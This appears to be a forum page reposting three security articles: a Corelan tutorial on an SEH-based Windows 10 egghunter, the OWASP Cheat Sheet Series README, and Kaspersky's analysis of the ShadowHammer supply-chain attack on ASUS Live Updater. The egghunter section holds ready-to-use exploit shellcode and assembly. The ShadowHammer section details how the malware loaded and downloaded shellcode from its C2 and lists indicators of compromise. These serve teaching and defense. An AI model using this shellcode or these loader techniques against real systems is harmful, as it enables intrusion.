"\x3C\x05" #CMP AL,5 "\x74\xE3" #JE SHORT "\xB8\x77\x30\x30\x74" #MOV EAX,74303077 "\x8B\xFA" #MOV EDI,EDX "\xAF" #SCAS DWORD PTR ES:[EDI] "\x75\xDE" #JNZ SHORT "\xAF" #SCAS DWORD PTR ES:[EDI] "\x75\xDB" #JNZ SHORT "\xFF\xE7" #JMP EDI This egghunter works great on Windows 10, but it assumes you’re running inside the wow64 environment (32bit process on 64bit OS). Of course, as Lincoln has explained in his blogpost, you can simply add a check to determine the architecture and make the egghunter work on native 32bit OS as well. You can generate this egghunter with mona.py too – simply run !mona egg -wow64 -winver 10 When debugging this egghunter (or any wow64 egghunter that is using system calls), you’ll notice access violations during the execution of the system call. These access violations can be safely passed through and will be handled by the OS… but the debugger will break every time it sees an access violation. (In essence, the debugger will break as soon as the code attempts to test a page that is not readable. In other words, you’ll get an awful lot of access violations, requiring your manual intervention.) If you’re using Immunity Debugger, you can simply tell the debugger to ignore the access violations. To do so, click on ‘debugging options’, and open the ‘exceptions’ tab. Add the following hex values under “Add range”: 0xC0000005 – ACCESS VIOLATION 0x80000001 – STATUS_GUARD_PAGE_VIOLATION Of course, when you have finished debugging the egghunter, don’t forget to remove these 2 exception again Going forward For sure, MS is entitled to change whatever they want in their Operating System. I don’t think developers are supposed to issue system calls themselves, I believe they should be using the wrapper functions in ntdll.dll instead. In other words, it should be “safe” for MS to change system call numbers. I don’t know what is behind the the system call number increment with every Windows version, and I don’t know if the system call numbers are going to remain the same forever, as Windows 10 has been labeled as the “last Windows version”. From an egghunter perspective that would be great. As an increasingly larger group of people adopts Windows 10, the egghunter will have an increasingly larger success ratio as well. But in reality I don’t know if that is a valid assumption to make or not. In any case it made me think: Would there be a way to use a different technique to make an egghunter work, without the use of system calls? And if so, would that technique also work on older versions of Windows? And if we’re not using system calls, would it work on native x86 and wow64 environments right away? Let’s see. Exception Handling The original paper on egghunters (“Safely Searching Process Virtual Address Space”) written by skape (2004!) already introduced the the use of custom exception handlers to handle the access violation that will occur if you’re trying to read from a page that is not accessible. By making the handler point back into the egghunter, the egghunter would be able to move on. The original implementation, unfortunately, no longer seems to work. While doing some testing (many years ago, as well as just recently on Windows 10), it looks the OS doesn’t really allow you to make the exception handler to point directly to the stack (haven’t tried the heap, but I expect the same restriction to be in place). In other words, if the egghunter runs from the stack or heap, you wouldn’t be able to make the egghunter use itself as exception handler and move on. Before looking at a possible solution, let’s remind ourselves of how the exception handling mechanism works. When the OS sees an exception and decides to pass it to the corresponding thread in the process, it will instruct a function in ntdll.dll to launch the Exception Handling mechanism within that thread. This routine will check the TEB at offset 0 (accessible via FS:[0]) and will retrieve the address of the topmost record in the exception handling chain on the stack. Each record consists of 2 fields: struct EXCEPTION_REGISTRATION { EXCEPTION_REGISTRATION *nextrecord; // pointer to next record (nseh) DWORD handler; // pointer to handler function }; The topmost record contains the address of the routine that will be called first in order to check if the application can handle the exception or not. If that routine fails, the next record in the chain will be tried (either until one of the routines is able to handle the exception, or until the default handler will be used, sending the process to heaven). So, in other words, the routine in ntdll.dll will find the record, and will call the “handler” address (i.e. whatever is placed in the second field of the record). So, translating this into the egghunter world: If we want to maintain control over what happens when an exception occurs, we’ll have to create a custom “topmost” SEH record, making sure it is the topmost record at all times during the execution of the egghunter, and we’ll have to make the record handler point into a routine that allows our egghunter to continue running and move on with the next page. Again, if our “custom” record is the topmost record, we’ll be sure that it will be the first one to be used. Of course we should be careful and take the consequences and effects of running the exception handling mechanism into account: The exception handling mechanism will change the value of ESP. The functionality will create an “exception dispatcher stack” frame at the new ESP location, with a pointer to the originating SEH frame at ESP+8. We’ll have to “undo” this change to ESP to make sure we make it point back to the area on the stack where the egghunter is storing its data. Next, we should also avoid creating new records all the time. Instead, we should try to continue to use the same record over and over again, avoiding to push data to the stack all the time, avoiding that we’d run out of stack space. Additionally, of course, the egghunter needs to be able to run from any location in memory. Finally, whatever we put as “SE Handler” (second field of the record) has to be SAFESEH compatible. Unfortunately that is the weak spot of my “solution”. Additionally, my routine won’t work if SEHOP is active. (but that’s not active by default on client systems IIRC) Creating our own custom SEH record means that we’re going to be writing something to the stack, overwriting/damaging what is already there. So, if your egghunter/shellcode is also on the stack around that location, you may want to adjust ESP before running the egghunter. Just sayin’ This is what my SEH based egghunter looks like (ready to compile with nasm): ; Universal SEH based egg hunter (x86 and wow64) ; tested on Windows 7 & Windows 10 ; written by Peter Van Eeckhoutte (corelanc0d3r) ; www.corelan.be - www.corelan-training.com - www.corelan-consulting.com ; ; warning: will damage stack around ESP ; ; usage: find a non-safeseh protected pointer to pop/pop/ret and put it in the placeholder below ; [BITS 32] CALL $+4 ; getPC routine RET POP ECX ADD ECX,0x1d ; offset to "handle" routine ;set up SEH record XOR EBX,EBX PUSH ECX ; remember where our 'custom' SE Handler routine will be PUSH ECX ; p/p/r will fly over this one PUSH 0x90c3585c ; trigger p/p/r again :) PUSH 0x44444444 ; Replace with P/P/R address ** PLACEHOLDER ** PUSH 0x04EB5858 ; SHORT JUMP MOV DWORD [FS:EBX],ESP ; put our SEH record to top of chain JMP nextpage handle: ; our custom handle SUB ESP,0x14 ; undo changes to ESP XOR EBX,EBX MOV DWORD [FS:EBX],ESP ; make our SEH record topmost again MOV EDX, [ESP-4] ; pick up saved EDX INC EDX nextpage: OR DX, 0x0FFF INC EDX MOV [ESP-4], EDX ; remember where we are searching MOV EAX, 0x74303077 ; w00t MOV EDI, EDX SCASD JNZ nextpage+5 SCASD JNZ nextpage+5 JMP EDI Let’s look at the various components of the egg hunter. First, the hunter starts with a “GetPC” routine (designed to find it’s own absolute address in memory), followed by an instruction that adds 0x1d bytes to the address it was able to retrieve using that GetPC routine. After adding this offset, ECX will contain the absolute address where the actual “handler” routine will be in memory. (referenced by label “handle” in the code above). Keep in mind, the egghunter needs to be able to dynamically determine this location at runtime, because the egghunter will use the exception handler mechanism to come back to itself and continue running the egghunter. That means we’ll need to know (determine) where it is, store the reference on the stack, so we can “retrieve/jump” to it later during the exception handling mechanism. Next, the code is creating a new custom SEH record. Although a SEH record only takes 2 fields, the code is actually pushing 5 specially crafted values on the stack. Only the last 2 of them will become the SEH record, the other ones are used to allow the exception handler to restore ESP and continue execution of the egghunter. Let’s look at what gets pushed and why: PUSH ECX: this is the address where the “handle” routine is in memory, as determined by the GetPC routine earlier. The exception handler will need to eventually return to this one. PUSH ECX: we’re pushing the address again, but this one won’t be used. We’ll be using the pop/pop/ret pointer twice. The first time will be used for the exception handler to bring execution back to our code, the second time it will be used to return to the “ECX” stored on the stack. This second ECX is just there to compensate for the second POP in the p/p/r. You can push anything you like on the stack. PUSH 0x90c3585C: this code will get executed. It’s a POP ESP, POP EAX, RET. This will reset the stack back to the original location on the stack where we have stored the SEH record. The RET will transfer execution back to the p/p/r pointer on the stack (part of the SEH record). In other words, the p/p/r pointer will be used twice. The second time, it will eventually return to the address of ECX that was stored on the stack. (see previous PUSH ECX instructions) Next, the real SEH record is created, by pushing 2 more values to the stack: Pointer to P/P/R (must be a non-safeseh protected pointer). We have to use a p/p/r because we can’t make this handler field point directly into the stack (or heap). As we can’t just make the exception mechanism go back directly to our codewe’ll use the pop/pop/ret to maintain control over the execution flow. In the code above, you’ll have to replace the 0x44444444 value with the address of a non-SafeSEH protected pop/pop/ret. Then, when an exception occurs (i.e. when the egghunter reaches a page that is not accessible), the pop/pop/ret will get triggered execute for the first time, returning to the 4 bytes in the first field of the SEH record. In the first field of the SEH record, I have placed 2 pops and a short jump forward sequence. This will adjust the stack slightly, so the pointer to the SEH record ends up at the top of the stack. Next it will jump to the instruction sequence that was pushed onto the stack earlier on (0x90C3585C). As explained, that sequence will trigger the POP/POP/RET again, which will eventually return to the stored ECX pointer (which is where the egghunter is) To complete the creation of the SEH record and to mark it as the topmost record, we’re simply writing its location into the TEB. As our new custom SEH record currently sits at ESP, we can simply write the value of ESP into the TEB at offset 0 (MOV DWORD [FS:EBX],ESP). (That’s why we cleared EBX in the first place) At this point, the egghunter is ready to test if a page is readable. The code will use EDX as the reference where to read from. The routine starts by going to the end of the page (OR DX, 0x0FFF), then goes to the start of the next page (INC EDX), and then we store the value of EDX on the stack (at [ESP-4]), so the exception handler would be able to pick it up later on. If the read attempt (SCASD) fails, an access violation will be triggered. The access violation will use our custom SEH record (as it is supposed to be the topmost record), and that routine is designed to resume execution of the egghunter (by running the “handle” routine, which will eventually restore the EDX pointer from the stack and move on to the next page). The “handle” routine will: Adjust the stack again, correcting its position to put it where it is/should be when running the egghunter. (SUB ESP,0x14) Next it will make sure our custom record is the topmost SEH record again (just anticipating in case some other code would have added a new topmost record). Finally it will pick up a reference from the stack (where we stored the last address we’ve tried to access) and move on (with the next page). If a page is readable, the egghunter will check for the presence of the tag, twice. If the tags are found, the final “JMP EDI” will tell the CPU to run the code placed right after the double tag. When debugging the egghunter, you’ll notice that it’ll throw access violations (when the code tries to access a page that is not accessible). Of course, in this case, these access violations are absolutely normal, but you’ll still have to pass the exceptions back to the application (Shift F9). You can also configure Immunity Debugger to ignore (and pass) the exceptions automatically, but configuring the Exceptions. To do so, click on ‘debugging options’, and open the ‘exceptions’ tab. Add the following hex values under “Add range”: 0xC0000005 – ACCESS VIOLATION 0x80000001 – STATUS_GUARD_PAGE_VIOLATION Of course, when you have finished debugging the egghunter, don’t forget to remove these 2 exception again. In order to use the egghunter, you’ll need to convert the asm instructions into opcode first. To do so, you’ll need to install nasm. (I have used the Win32 installer from https://www.nasm.us/pub/nasm/releasebuilds/2.14.02/win32/) Save the asm code snippet above into a text file (for instance “c:\dev\win10_egghunter_seh.nasm”). Next, run “nasm” to convert it into a binary file that contains the opcode: "C:\Program Files (x86)\NASM\nasm.exe" -o c:\dev\win10_egghunter_seh.obj c:\dev\win10_egghunter_seh.nasm Next, dump the contents of the binary file to a hex format that you can use in your scripts and exploits: python c:\dev\bin2hex.py c:\dev\win10_egghunter_seh.obj (You can find a copy of the bin2hex.py script in Corelan’s github repository) If all goes well, this is what you’ll get: "\xe8\xff\xff\xff\xff\xc3\x59\x83" "\xc1\x1d\x31\xdb\x51\x51\x68\x5c" "\x58\xc3\x90\x68\x44\x44\x44\x44" "\x68\x58\x58\xeb\x04\x64\x89\x23" "\xeb\x0d\x83\xec\x14\x31\xdb\x64" "\x89\x23\x8b\x54\x24\xfc\x42\x66" "\x81\xca\xff\x0f\x42\x89\x54\x24" "\xfc\xb8\x77\x30\x30\x74\x89\xd7" "\xaf\x75\xf1\xaf\x75\xee\xff\xe7" Again, don’t forget to replace the \x44\x44\x44\x44 (end of third line) with the address of a pop/pop/ret (and to store the address in little endian, if you are editing the bytes ) Python friendly copy/paste code: egghunter = ("\xe8\xff\xff\xff\xff\xc3\x59\x83" "\xc1\x1d\x31\xdb\x51\x51\x68\x5c" "\x58\xc3\x90\x68") egghunter += "\x??\x??\x??\x??" #replace with pointer to pop/pop/ret. Use !mona seh egghunter += ("\x68\x58\x58\xeb\x04\x64\x89\x23" "\xeb\x0d\x83\xec\x14\x31\xdb\x64" "\x89\x23\x8b\x54\x24\xfc\x42\x66" "\x81\xca\xff\x0f\x42\x89\x54\x24" "\xfc\xb8\x77\x30\x30\x74\x89\xd7" "\xaf\x75\xf1\xaf\x75\xee\xff\xe7") I have not added the routine to mona.py yet (but I will, eventually, at some point). Of course, if you see room for improvement, and/or able to reduce the size of the egghunter, please don’t hesitate to let me know. (I’ll be waiting for your feedback for a while before adding it to mona). Of course I’d love to hear if the egghunter works for you, and if it works across Windows versions and architectures (32bit systems, older Windows versions, etc). That’s all folks Thanks for reading! I hope you have enjoyed this brand new article and I hope you’re as excited about the future as much as I am. If you would like to hang out, discuss infosec topics, ask question (and answer questions), please sign up to our Slack workspace. To access the workspace: Head over to https://www.facebook.com/corelanconsulting (and like the page while you’re at it). You don’t need a facebook account, the page is public. Scroll through the posts and look for the one that contains the invite link to Slack Register, done. Also, feel free to follow us on Twitter (@corelanconsult) to stay informed about new articles and blog posts. Corelan Training & Corelan Consulting This article is just a small example of what you’ll learn in our Corelan Bootcamp. If you’d like to take one of our Corelan classes, check our schedules at https://www.corelan-training.com/index.php/training-schedules. If you prefer to set up a class at your company or conference, don’t hesitate to contact me via this form. As explained at the start of the article: the trainings and consulting gigs are now my main form of income. I am only able to do research and publish information for free if I can make a living as well. This website is supported, hosted and funded by Corelan Consulting. The more classes I can teach and the more consulting I can do, the more time I can invest in research and publication of tutorials. Thanks! © 2019, Peter Van Eeckhoutte (corelanc0d3r). All rights reserved. Sursa: https://www.corelan.be/index.php/2019/04/23/windows-10-egghunter/
-
- 1
-
-
Welcome to OWASP Cheat Sheet Series V2 This repository contains all the cheat sheets of the project and represent the V2 of the OWASP Cheat Sheet Series project. Table of Contents Cheat Sheets index Special thanks Editor & validation policy Conversion rules How to setup my contributor environment? How to contribute? Offline website Project leaders Core technical review team PR usage for core commiters Project logo Folders License Code of conduct Cheat Sheets index The following indexes are provided: This index reference all released cheat sheets sorted alphabetically. This index is automatically generated by this script. This index reference all released cheat sheets using the OWASP ASVS project as reading source. This index is manually managed in order to allow contribution along custom content. This index reference all released cheat sheets using the OWASP Proactive Controls project as reading source. This index is manually managed in order to allow contribution along custom content. You can also search into this repository using a keywords via this URL: https://github.com/OWASP/CheatSheetSeries/search?q=[KEYWORDS] Example: https://github.com/OWASP/CheatSheetSeries/search?q=csrf More information about the GitHub search feature can be found here. Project leaders Dominique Righetto. Jim Manico. Core technical review team Any GitHub member is free to add a comment on any Proposal (issue) or PR. However, we have created an official core technical review team (core commiters) in order to: Review all PR/Proposal in a consistent/regular way using GitHub's review feature. Extend the field of technologies known by the review team. Allow several technical opinions on a Proposal/PR, all exchanges are public because we use the GitHub comment feature. Decision of the core technical review team have the same weight than the projet leaders, so, if a reviewer reject a PR (rejection must be technically documented and explained) then project leaders will apply the global decision. Members: Elie Saad. Jakub Maćkowski. Dominique Righetto. Jim Manico. PR usage for core commiters For the following kind of modification, the PR system will be used by the core commiters in order to allow peer review using the GitHub PR review system: Adding of new cheat sheet. Deep modification of an existing cheat sheet. This the procedure: Clone the project. Move on the master branch: git checkout master Create a branch named feature_request_[ID] where [ID] is the number of the linked issue opened prior to the PR to follow the contribution process: git checkout -b feature_request_[ID] Switch on this new branch (normally it's the already the case): git checkout feature_request_[ID] Do the expected work. Push the new branch: git push origin feature_request_[ID] When the work is ready for the review, create a pull request by visiting this link: https://github.com/OWASP/CheatSheetSeries/pull/new/feature_request_[ID] Implements the modification requested by the reviewers and when the core technical review team is OK then the PR is merged. Once merged, delete the branch using this GitHub feature. See project current branches. Project logo Project's official logo files are hosted here. Folders cheatsheets_excluded: Contains the cheat sheets markdown files converted with PANDOC and for which a discussion must be made in order to decide if we include them into the V2 of the project due to the content has not been updated since a long time or is not relevant anymore. See this discussion. cheatsheets: Contains the final cheat sheets files. Any .md file present into this folder is considered released. assets: Contains the assets used by the cheat sheets (images, pdf, zip...). Naming convention is [CHEAT_CHEET_MARKDOWN_FILE_NAME]_[IDENTIFIER].[EXTENSION] Use PNG format for the images. scripts: Contains all the utility scripts used to operate the project (markdown linter audit, dead link identification...). templates: Contains templates used for different kinds of files (cheatsheet...). .github: Contains materials used to configure different behaviors of GitHub. .circleci / .travis.yml (file): Contains the definition of the integration jobs used to control the integrity and consistency of the whole project: TravisCI is used to perform compliance check actions at each Push/Pull Request. It must be/stay the fastest possible (currently inferior to 2 minutes) in order to provide a rapid compliance feedback about the Push/Pull Request. CircleCI is used to perform operations taking longer time like build, publish and deploy actions. Offline website Unfortunately, a PDF file generation is not possible because the content is cut in some cheat sheets like for example the abuse case one. However, to propose the possibility the consult, in a full offline mode, the collection of all cheat sheets, a script to generate a offline site using GitBook has been created. The script is here. book.json: Gitbook configuration file. Preface.md: Project preface description applied on the generated site. Automated build This link allow you to download a build (zip archive) of the offline website. Manual build Use the commands below to generate the site: # Your python version must be >= 3.5 $ python --version Python 3.5.3 # Dependencies: # sudo apt install -y nodejs # sudo npm install gitbook-cli -g $ cd scripts $ bash Generate_Site.sh Generate a offline portable website with all the cheat sheets... Step 1/5: Init work folder. Step 2/5: Generate the summary markdown page. Index updated. Summary markdown page generated. Step 3/5: Create the expected GitBook folder structure. Step 4/5: Generate the site. info: found 45 pages info: found 86 asset files info: >> generation finished with success in 14.2s ! Step 5/5: Cleanup. Generation finished to the folder: ../generated/site $ cd ../generated/site/ $ ls -l drwxr-xr-x 1 Feb 3 11:05 assets drwxr-xr-x 1 Feb 3 11:05 cheatsheets drwxr-xr-x 1 Feb 3 11:05 gitbook -rw-r--r-- 1 Feb 3 11:05 index.html -rw-r--r-- 1 Feb 3 11:05 search_index.json Conversion rules Use the markdown syntax described in this guide. Use this sheet for Superscript and Subscript characters. Use this sheet for Arrows (left, right, top, down) characters. Store all assets in the assets folder and use the following syntax:  for the insertion of an image. Use PNG format for the images (this software can be used to handle format conversion). [ALTERNATE_NAME](../assets/ASSET_NAME.EXT) for the insertion of other kinds of media (pdf, zip...). Use ATX style (# syntax) for section head. Use **bold** syntax for bold text. Use *italic* syntax for italic text. Use TAB for nested lists and not spaces. Use code fencing syntax along syntax highlighting for code snippet (prevent when possible horizontal scrollbar). If you use {{ or }} pattern in code fencing then add a space between the both curly braces (ex: { {) otherwise it break GitBook generation process. Same remark about the cheat sheet file name, only the following syntax is allowed: [a-zA-Z_]+. No HTML code is allowed, only markdown syntax is allowed! Use this site for generation of tables. Use a single new line between a section head and the beginning of its content. Editor & validation policy Visual Studio Code is used for the work on the markdown files. It is also used for the work on the scripts. The file Project.code-workspace is the workspace file in order to open the project in VSCode. The following plugin is used to validate the markdown content. The file .markdownlint.json define the central validation policy applied at VSCode (IDE) and TravisCI (CI) levels. Details about rules is here. The file .markdownlinkcheck.json define the configuration used to validate using this tool, at TravisCI level, all web and relatives links used in cheat sheets. How to setup my contributor environment? See here. How to contribute? See here. Special thanks A special thanks you to the following peoples for the help provided during the migration: ThunderSon: Deeply help about updating the OWASP wiki links for all the migrated cheat sheets. mackowski: Deeply help about updating the OWASP wiki links for all the migrated cheat sheets. License See here. Sursa: https://github.com/OWASP/CheatSheetSeries
-
Operation ShadowHammer: a high-profile supply chain attack By GReAT, AMR on April 23, 2019. 10:00 am In late March 2019, we briefly highlighted our research on ShadowHammer attacks, a sophisticated supply chain attack involving ASUS Live Update Utility, which was featured in a Kim Zetter article on Motherboard. The topic was also one of the research announcements made at the SAS conference, which took place in Singapore on April 9-10, 2019. Now it is time to share more details about the research with our readers. At the end of January 2019, Kaspersky Lab researchers discovered what appeared to be a new attack on a large manufacturer in Asia. Our researchers named it “Operation ShadowHammer”. Some of the executable files, which were downloaded from the official domain of a reputable and trusted large manufacturer, contained apparent malware features. Careful analysis confirmed that the binary had been tampered with by malicious attackers. It is important to note that any, even tiny, tampering with executables in such a case normally breaks the digital signature. However, in this case, the digital signature was intact: valid and verifiable. We quickly realized that we were dealing with a case of a compromised digital signature. We believe this to be the result of a sophisticated supply chain attack, which matches or even surpasses the ShadowPad and the CCleaner incidents in complexity and techniques. The reason that it stayed undetected for so long is partly the fact that the trojanized software was signed with legitimate certificates (e.g. “ASUSTeK Computer Inc.”). The goal of the attack was to surgically target an unknown pool of users, who were identified by their network adapters’ MAC addresses. To achieve this, the attackers had hardcoded a list of MAC addresses into the trojanized samples and the list was used to identify the intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from more than 200 samples used in the attack. There might be other samples out there with different MAC addresses on their lists, though. Technical details The research started upon the discovery of a trojanized ASUS Live Updater file (setup.exe), which contained a digital signature of ASUSTeK Computer Inc. and had been backdoored using one of the two techniques explained below. In earlier variants of ASUS Live Updater (i.e. MD5:0f49621b06f2cdaac8850c6e9581a594), the attackers replaced the WinMain function in the binary with their own. This function copies a backdoor executable from the resource section using a hardcoded size and offset to the resource. Once copied to the heap memory, another hardcoded offset, specific to the executable, is used to start the backdoor. The offset points to a position-independent shellcode-style function that unwraps and runs the malicious code further. Some of the older samples revealed the project path via a PDB file reference: “D:\C++\AsusShellCode\Release\AsusShellCode.pdb“. This suggests that the attackers had exclusively prepared the malicious payload for their target. A similar tactic of precise targeting has become a persistent property of these attackers. A look at the resource section used for carrying the malicious payload revealed that the attackers had decided not to change the file size of the ASUS Live Updater binary. They changed the resource contents and overwrote a tiny block of the code in the subject executable. The layout of that patched file is shown below. We managed to find the original ASUS Live Updater executable which had been patched and abused by the attackers. As a result, we were able to recover the overwritten data in the resource section. The file we found was digitally signed and certainly had no infection present. Both the legitimate ASUS executable and the resource-embedded updater binary contain timestamps from March 2015. Considering that the operation took place in 2018, this raises the following question: why did the attackers choose an old ASUS binary as the infection carrier? Another injection technique was found in more recent samples. Using that technique, the attackers patched the code inside the C runtime (CRT) library function “___crtExitProcess”. The malicious code executes a shellcode loader instead of the standard function “___crtCorExitProcess”: This way, the execution flow is passed to another address which is located at the end of the code section. The attackers used a small decryption routine that can fit into a block at the end of the code section, which has a series of zero bytes in the original executable. They used the same source executable file from ASUS (compiled in March 2015) for this new type of injection. The loader code copies another block of encrypted shellcode from the file’s resource section (of the type “EXE”) to a newly allocated memory block with read-write-execute attributes and decrypts it using a custom block-chaining XOR algorithm, where the first dword is the initial seed and the total size of the shellcode is stored at an offset of +8. We believe that the attackers changed the payload start routine in an attempt to evade detection. Apparently, they switched to a better method of hiding their embedded shellcode at some point between the end of July and September 2018. ShadowHammer downloader The compromised ASUS binaries carried a payload that was a Trojan downloader. Let us take a closer look at one such ShadowHammer downloader extracted from a copy of the ASUS Live Updater tool with MD5:0f49621b06f2cdaac8850c6e9581a594. It has the following properties: MD5: 63f2fe96de336b6097806b22b5ab941a SHA1: 6f8f43b6643fc36bae2e15025d533a1d53291b8a SHA256: 1bb53937fa4cba70f61dc53f85e4e25551bc811bf9821fc47d25de1be9fd286a Digital certificate fingerprint: 0f:f0:67:d8:01:f7:da:ee:ae:84:2e:9f:e5:f6:10:ea File Size: 1’662’464 bytes File Type: PE32 executable (GUI) Intel 80386, for MS Windows Link Time: 2018.07.10 05:58:19 (GMT) The relatively large file size is explained by the presence of partial data from the original ASUS Live Updater application appended to the end of the executable. The attackers took the original Live Updater and overwrote it with their own PE executable starting from the PE header, so that the file contains the actual PE image, whose size is only 40448 bytes, while the rest comes from ASUS. The malicious executable was created using Microsoft Visual C++ 2010. The core function of this executable is in a subroutine which is called from WinMain, but also executed directly via a hardcoded offset from the code injected into ASUS Live Updater. The code uses dynamic import resolution with its own simple hashing algorithm. Once the imports are resolved, it collects MAC addresses of all available network adapters and calculates an MD5 hash for each of these. After that, the hashes are compared against a table of 55 hardcoded values. Other variants of the downloader contained a different table of hashes, and in some cases, the hashes were arranged in pairs. In other words, the malware iterates through a table of hashes and compares them to the hashes of local adapters’ MAC hashes. This way, the target system is recognized and the malware proceeds to the next stage, downloading a binary object from https://asushotfix[.]com/logo.jpg (or https://asushotfix[.]com/logo2.jpg in newer samples). The malware also sends the first hash from the match entry as a parameter in the request to identify the victim. The server response is expected to be an executable shellcode, which is placed in newly allocated memory and started. Our investigation uncovered 230 unique samples with different shellcodes and different sets of MAC address hashes. This leads us to believe that the campaign targeted a vast number of people or companies. In total, we were able to extract 14 unique hash tables. The smallest hash table found contained eight entries and the biggest, 307 entries. Interestingly, although the subset of hash entries was changing, some of the entries were present in all of the tables. For all users whose MAC did not match expected values, the code would create an INI file located two directory levels above the current executable and named “idx.ini”. Three values were written into the INI file under the [IDX_FILE] section: [IDX_FILE] XXX_IDN=YYYY-MM-DD XXX_IDE=YYYY-MM-DD XXX_IDX=YYYY-MM-DD where YYYY-MM-DD is a date one week ahead of the current system date. The code injected by the attackers was discovered with over 57000 Kaspersky Lab users. It would run but remain silent on systems that were not primary targets, making it almost impossible to discover the anomalous behavior of the trojanized executables. The exact total of the affected users around the world remains unknown. Digital signature abuse A lot of computer security software deployed today relies on integrity control of trusted executables. Digital signature verification is one such method. In this attack, the attackers managed to get their code signed with a certificate of a big vendor. How was that possible? We do not have definitive answers, but let us take a look at what we observed. First of all, we noticed that all backdoored ASUS binaries were signed with two different certificates. Here are their fingerprints: 0ff067d801f7daeeae842e9fe5f610ea 05e6a0be5ac359c7ff11f4b467ab20fc The same two certificates have been used in the past to sign at least 3000 legitimate ASUS files (i.e. ASUS GPU Tweak, ASUS PC Link and others), which makes it very hard to revoke these certificates. All of the signed binaries share certain interesting features: none of them had a signing timestamp set, and the digest algorithm used was SHA1. The reason for this could be an attempt at hiding the time of the operation to make it harder to discover related forensic artefacts. Although there is no timestamp that can be relied on to understand when the attack started, there is a mandatory field in the certificate, “Certificate Validity Period”, which can help us to understand roughly the timeframe of the operation. Apparently, because the certificate that the attackers relied on expired in 2018 and therefore had to be reissued, they used two different certificates. Another notable fact is that both abused certificates are from the DigiCert SHA2 Assured ID Code Signing CA. The legitimate ASUS binaries that we have observed use a different certificate, which was issued by the DigiCert EV Code Signing CA (SHA2). EV stands for “Extended Validation” and provides for stricter requirements for the party that intends to use the certificate, including hardware requirements. We believe that the attackers simply did not have access to a production signing device with an EV certificate. This indicates that the attackers most likely obtained a copy of the certificates or abused a system on the ASUS network that had the certificates installed. We do not know about all software with malware injection they managed to sign, and we believe that the compromised signing certificates must be removed and revoked. Unfortunately, one month after this was reported to ASUS, newly released software (i.e. md5: 1b8d2459d4441b8f4a691aec18d08751) was still being signed with a compromised certificate. We have immediately notified ASUS about this and provided evidence as required. ASUS-related attack samples Using decrypted shellcode and through code similarity, we found a number of related samples which appear to have been part of a parallel attack wave. These files have the following properties: they contain the same shellcode style as the payload from the compromised ASUS Live Updater binaries, albeit unencrypted they have a forgotten PDB path of “D:\C++\AsusShellCode\Release\AsusShellCode.pdb” the shellcode from all of these samples connects to the same C2: asushotfix[.]com all samples were compiled between June and July 2018 the samples have been detected on computers all around the globe The hashes of these related samples include: 322cb39bc049aa69136925137906d855 36dd195269979e01a29e37c488928497 7d9d29c1c03461608bcab930fef2f568 807d86da63f0db1fc746d1f0b05bc357 849a2b0dc80aeca3d175c139efe5221c 86A4CAC227078B9C95C560C8F0370BF0 98908ce6f80ecc48628c8d2bf5b2a50c a4b42c2c95d1f2ff12171a01c86cd64f b4abe604916c04fe3dd8b9cb3d501d3f eac3e3ece94bc84e922ec077efb15edd 128CECC59C91C0D0574BC1075FE7CB40 88777aacd5f16599547926a4c9202862 These files are dropped by larger setup files / installers, signed by an ASUS certificate (serial number: 0ff067d801f7daeeae842e9fe5f610ea) valid from 2015-07-27 till 2018-08-01). The hashes of the larger installers/droppers include: 0f49621b06f2cdaac8850c6e9581a594 17a36ac3e31f3a18936552aff2c80249 At this point, we do not know how they were used in these attacks and whether they were delivered via a different mechanism. These files were located in a “TEMP” subfolder for ASUS Live Updater, so it is possible that the software downloaded these files directly. Locations where these files were detected include: asus\asus live update\temp\1\Setup.exe asus\asus live update\temp\2\Setup.exe asus\asus live update\temp\3\Setup.exe asus\asus live update\temp\5\Setup.exe asus\asus live update\temp\6\Setup.exe asus\asus live update\temp\9\Setup.exe Public reports of the attack While investigating this case, we were wondering how such a massive attack could go unnoticed on the Internet. Searching for any kind of evidence related to the attack, we came by a Reddit thread created in June 2018, where user GreyWolfx posted a screenshot of a suspicious-looking ASUS Live Update message: The message claims to be a “ASUS Critical Update” notification, however, the item does not have a name or version number. Other users commented in the thread, while some uploaded the suspicious updater to VirusTotal: The file uploaded to VT is not one of the malicious compromised updates; we can assume the person who uploaded it actually uploaded the ASUS Live Update itself, as opposed to the update it received from the Internet. Nevertheless, this could suggest that potentially compromised updates were delivered to users as far back as June 2018. In September 2018, another Reddit user, FabulaBerserko also posted a message about a suspicious ASUS Live update: Asus_USA replied to FabulaBerserko with the following message, suggesting he run a scan for viruses: In his message, the Reddit user FabulaBerserko talks about an update listed as critical, however without a name and with a release date of March 2015. Interestingly, the related attack samples containing the PDB “AsusShellCode.pdb” have a compilation timestamp from 2015 as well, so it is possible that the Reddit user saw the delivery of one such file through ASUS Live Update in September 2018. Targets by MAC address We managed to crack all of the 600+ MAC address hashes and analyzed distribution by manufacturer, using publicly available Ethernet-to-vendor assignment lists. It turns out that the distribution is uneven and certain vendors are a higher priority for the attackers. The chart below shows statistics we collected based on network adapter manufacturers’ names: Some of the MAC addresses included on the target list were rather popular, i.e. 00-50-56-C0-00-08 belongs to the VMWare virtual adapter VMNet8 and is the same for all users of a certain version of the VMware software for Windows. To prevent infection by mistake, the attackers used a secondary MAC address from the real Ethernet card, which would make targeting more precise. However, it tells us that one of the targeted users used VMWare, which is rather common for software engineers (in testing their software). Another popular MAC was 0C-5B-8F-27-9A-64, which belongs to the MAC address of a virtual Ethernet adapter created by a Huawei USB 3G modem, model E3372h. It seems that all users of this device shared the same MAC address. Interaction with ASUS The day after the ShadowHammer discovery, we created a short report for ASUS and approached the company through our local colleagues in Taiwan, providing all details of what was known about the attack and hoping for cooperation. The following is a timeline of the discovery of this supply-chain attack, together with ASUS interaction and reporting: 29-Jan-2019 – initial discovery of the compromised ASUS Live Updater 30-Jan-2019 – created preliminary report to be shared with ASUS, briefed Kaspersky Lab colleagues in Taipei 31-Jan-2019 – in-person meeting with ASUS, teleconference with researchers; we notified ASUS of the finding and shared hard copy of the preliminary attack report with indicators of compromise and Yara rules. ASUS provided Kaspersky with the latest version of ASUS Live Updater, which was analyzed and found to be uninfected. 01-Feb-2019 – ASUS provides an archive of all ASUS Live Updater tools beginning from 2018. None of them were infected, and they were signed with different certificates. 14-Feb-2019 – second face-to-face meeting with ASUS to discuss the details of the attack 20-Feb-2019 – update conf call with ASUS to provide newly found details about the attack 08-Mar-2019 – provided the list of targeted MAC addresses to ASUS, answered other questions related to the attack 08-Apr-2019 – provided a comprehensive report on the current attack investigation to ASUS. We appreciate a quick response from our ASUS colleagues just days before one of the largest holidays in Asia (Lunar New 